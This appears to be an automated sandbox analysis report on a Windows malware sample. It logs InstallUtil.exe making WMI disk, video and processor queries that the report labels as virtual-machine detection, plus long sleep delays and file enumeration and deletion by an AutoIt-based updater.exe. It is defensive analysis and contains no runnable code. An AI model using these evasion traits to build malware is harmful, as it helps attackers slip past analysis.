Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ehcfdbh\AutoIt3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: C20000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2810000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4810000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2C70000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2D20000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4D20000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1600000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 3180000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1600000 memory reserve \| memory write watch

Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2015	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1024	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 754	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 631	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5890	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3871	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5839	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3791	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 3066
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 6366

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	API coverage: 5.8 %
Source: C:\ehcfdbh\AutoIt3.exe	API coverage: 5.7 %

Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7940	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7940	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004	Thread sleep count: 2015 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004	Thread sleep count: 1024 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156	Thread sleep count: 754 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156	Thread sleep count: 631 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7616	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5520	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4860	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8876	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8876	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -49675s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8876	Thread sleep time: -59824s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -47789s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8876	Thread sleep time: -59703s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -51793s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8876	Thread sleep time: -59594s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -49580s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8876	Thread sleep time: -59484s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8876	Thread sleep time: -59372s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8876	Thread sleep time: -59266s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -30468s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8876	Thread sleep time: -59153s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -48907s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8876	Thread sleep time: -59047s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -44026s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8876	Thread sleep time: -58938s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -48513s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8876	Thread sleep time: -58828s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -59660s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8876	Thread sleep time: -58718s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -59301s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -33045s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -55286s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -43177s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -35804s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -58930s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -38318s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -53020s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -48043s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -42470s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -38387s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -59549s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8952	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8968	Thread sleep time: -780000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -39119s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -30441s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -57573s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -32026s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8964	Thread sleep time: -1200000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -52785s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -33844s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -58741s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -56533s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -59895s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -32195s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -51146s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -38736s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -35116s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -56166s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -41045s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -58681s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -48467s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -39880s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -47918s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -56563s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -55726s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -52655s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8856	Thread sleep time: -36439s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9096	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6376	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ehcfdbh\AutoIt3.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ehcfdbh\AutoIt3.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_00374005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_00374005
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_0037C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	20_2_0037C2FF
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_0037494A GetFileAttributesW,FindFirstFileW,FindClose,	20_2_0037494A
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_0037CD14 FindFirstFileW,FindClose,	20_2_0037CD14
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_0037CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	20_2_0037CD9F
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_0037F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_0037F5D8
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_0037F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_0037F735
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_0037FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	20_2_0037FA36
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_00373CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_00373CE2
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016D68B5 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	20_2_016D68B5
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016D41E5 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	20_2_016D41E5
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016D69BD FindFirstFileA,GetLastError,	20_2_016D69BD
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CE4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	22_2_00CE4005
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CEC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	22_2_00CEC2FF
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CE494A GetFileAttributesW,FindFirstFileW,FindClose,	22_2_00CE494A
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	22_2_00CECD9F
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CECD14 FindFirstFileW,FindClose,	22_2_00CECD14
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CEF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	22_2_00CEF5D8
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CEF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	22_2_00CEF735
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CEFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	22_2_00CEFA36
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CE3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	22_2_00CE3CE2
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_013436ED FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	22_2_013436ED
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_0134101D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	22_2_0134101D
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_013437F5 FindFirstFileA,GetLastError,	22_2_013437F5

